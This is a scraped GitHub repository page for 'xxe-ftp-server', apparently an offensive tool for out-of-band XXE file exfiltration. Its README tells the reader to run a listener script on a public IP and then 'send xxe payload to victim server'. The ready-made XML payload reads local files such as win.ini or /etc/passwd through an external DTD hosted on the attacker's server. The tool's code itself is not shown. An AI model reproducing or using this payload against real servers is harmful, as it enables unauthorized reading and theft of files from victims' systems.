Skip to content
/ xxe-ftp-server Public
forked from LandGrey/xxe-ftp-server

xxe oob receive file via web and ftp server

0 stars 19 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

coolboy0816/xxe-ftp-server

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
README.md
README.md
 
 
xxe-ftp-server.py
xxe-ftp-server.py
 
 

Repository files navigation

xxe-ftp-server

xxe oob receive file via web and ftp server

Step 1:

run script:

python2 xxe-ftp-server.py public-ip-address web-port ftp-port

such as:

python2 xxe-ftp-server.py 1.1.1.1 80 2121

Step 2:

send xxe payload to victim server:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
  <!ENTITY % dtd SYSTEM "http://1.1.1.1:80/data.dtd"> %dtd;
]>
<data>&send;</data>

c:/windows/win.ini is read file path,such as etc/passwd

1.1.1.1:80 is public-server-ip and web-bind-port

About

xxe oob receive file via web and ftp server

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%